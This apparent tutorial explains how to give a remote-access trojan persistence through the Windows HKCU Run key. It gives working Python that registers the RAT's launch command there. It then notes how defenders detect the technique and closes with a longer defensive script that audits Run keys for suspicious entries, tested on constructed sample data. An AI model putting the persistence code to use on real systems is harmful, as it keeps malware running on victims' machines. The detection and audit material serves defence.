Achieving Persistence via Registry Manipulation
To make a RAT survive a reboot, you can register it under a Windows Registry autostart key. This is one of the most common persistence techniques (MITRE ATT&CK T1547.001, Registry Run Keys / Startup Folder) and takes only a few lines of Python.
Registry Key for Startup
The key to persistence is adding the RAT's launch command as a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
Windows executes every value in that key when the current user logs on, so after each reboot the RAT comes back as soon as that user signs in (not at boot itself, and not for other users). HKCU is writable without elevation; the HKLM counterpart applies to all users but requires administrator rights.
Python Code for Registry Persistence:
import os
import sys
import winreg as reg

def add_to_registry(value_name="MyRAT"):
    # When the RAT has been packaged into an .exe (PyInstaller sets sys.frozen),
    # sys.executable is the RAT binary itself. When it runs as a plain .py script,
    # a bare script path would only start through the .py file association, so the
    # value must name the interpreter and the script. Paths are quoted so that a
    # space in the path does not break the command line.
    if getattr(sys, "frozen", False):
        command = f'"{sys.executable}"'
    else:
        command = f'"{sys.executable}" "{os.path.abspath(__file__)}"'
    # Per-user Run key; opening it with KEY_SET_VALUE needs no elevation
    key = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with reg.OpenKey(reg.HKEY_CURRENT_USER, key, 0, reg.KEY_SET_VALUE) as run_key:
        # REG_SZ value: the name is arbitrary, the data is the command to run
        reg.SetValueEx(run_key, value_name, 0, reg.REG_SZ, command)

# Call the function to ensure persistence
if __name__ == "__main__":
    add_to_registry()
This code adds the RAT to the user's startup programs by writing a value to the Run key. Each time that user logs on after a reboot, Windows executes the stored command. The trade-off is visibility: Run-key values are the first thing Sysinternals Autoruns lists, and where Sysmon is deployed the write itself is recorded as Event ID 13 (RegistryEvent, Value Set) against the Run key path. Defenders routinely baseline this key, so a value named "MyRAT" pointing at a script under AppData is about as conspicuous as persistence gets.
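The defensive counterpart to the technique above, as an added example that is not part of the original page: an audit script that enumerates the Run and RunOnce keys and flags the traits the persistence code leaves behind (a script host such as python.exe as the command, a script file as its argument, a target in a user-writable directory, or an unquoted path with spaces). The live enumeration uses winreg and only works on Windows; the triage logic runs anywhere, and the SAMPLE_ENTRIES below are constructed data, not values captured from a real host. Function names, the SCRIPT_HOSTS list and the USER_WRITABLE pattern are this example's own choices.

```python
from __future__ import annotations
import re
import shlex
from dataclasses import dataclass

# Autostart keys Windows evaluates at logon; HKCU is per-user, HKLM is machine-wide.
# The WOW6432Node path is the 32-bit view that 64-bit Windows keeps alongside it.
RUN_KEYS = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"),
]

# Interpreters a dropped script needs in order to run at all (example's own list).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe",
                "rundll32.exe", "regsvr32.exe"}
SCRIPT_EXT = re.compile(r"\.(pyw?|ps1|vbs|js|hta|bat|cmd)$", re.IGNORECASE)
# Locations a standard user can write to; vendor autostarts rarely live here.
USER_WRITABLE = re.compile(
    r"\\(appdata\\roaming|appdata\\local\\temp|downloads|temp|public)\\", re.IGNORECASE)

@dataclass
class RunEntry:
    hive: str
    key: str
    name: str
    command: str

def parse_command(command: str) -> list[str]:
    """Split a Run-key value into argv the way CreateProcess sees it:
    double quotes group, backslashes are path separators rather than escapes."""
    lexer = shlex.shlex(command, posix=True)
    lexer.whitespace_split = True
    lexer.escape = ""
    lexer.quotes = '"'
    return list(lexer)

def triage(entry: RunEntry) -> list[tuple[str, str]]:
    """Return (category, detail) findings for one entry; [] means nothing stood out."""
    findings = []
    argv = parse_command(entry.command)
    if not argv:
        return [("empty-command", entry.name)]
    exe_name = argv[0].rsplit("\\", 1)[-1].lower()
    # An unquoted path with spaces splits at the first space, leaving a first token
    # with no extension (e.g. C:\Program); CreateProcess then probes each prefix.
    if not entry.command.lstrip().startswith('"') and "." not in exe_name:
        findings.append(("unquoted-path", entry.command))
    if exe_name in SCRIPT_HOSTS:
        findings.append(("script-host", exe_name))
    for arg in argv[1:]:
        if SCRIPT_EXT.search(arg):
            findings.append(("script-payload", arg))
    for path in argv:
        if USER_WRITABLE.search(path):
            findings.append(("user-writable", path))
    return findings

def enumerate_run_keys() -> list[RunEntry]:
    """Read the live Run keys. Windows-only; returns [] where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return []
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    entries = []
    for hive, path in RUN_KEYS:
        try:
            with winreg.OpenKey(hives[hive], path) as key:
                index = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, index)
                    except OSError:      # no more values under this key
                        break
                    entries.append(RunEntry(hive, path, name, str(value)))
                    index += 1
        except OSError:                  # key absent or not readable
            continue
    return entries

# Constructed sample entries for offline runs; the MyRAT value mirrors what the
# persistence code above would write for an unpackaged script.
SAMPLE_ENTRIES = [
    RunEntry("HKCU", RUN_KEYS[0][1], "OneDrive",
             r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RunEntry("HKCU", RUN_KEYS[0][1], "MyRAT",
             r'"C:\Users\bob\AppData\Local\Programs\Python\python.exe" "C:\Users\bob\AppData\Roaming\svc.py"'),
    RunEntry("HKLM", RUN_KEYS[2][1], "SecurityHealth",
             r"C:\Windows\system32\SecurityHealthSystray.exe"),
    RunEntry("HKLM", RUN_KEYS[2][1], "Updater",
             r"C:\Program Files\Vendor Tool\update.exe /silent"),
]

def audit(entries: list[RunEntry]) -> dict[str, list[tuple[str, str]]]:
    """Map each entry's value name to its findings, keeping only flagged entries."""
    return {e.name: triage(e) for e in entries if triage(e)}

if __name__ == "__main__":
    for name, findings in audit(enumerate_run_keys() or SAMPLE_ENTRIES).items():
        print(name, findings)
```

Run on Windows it reads the real keys; elsewhere it falls back to the sample data, which flags MyRAT on all three traits and Updater for its unquoted path while the two vendor entries pass. The heuristics are deliberately coarse: AppData\Local is not treated as suspicious because many legitimate per-user autostarts live there, so a script-host or script-payload hit is the signal to act on and the directory check is supporting context.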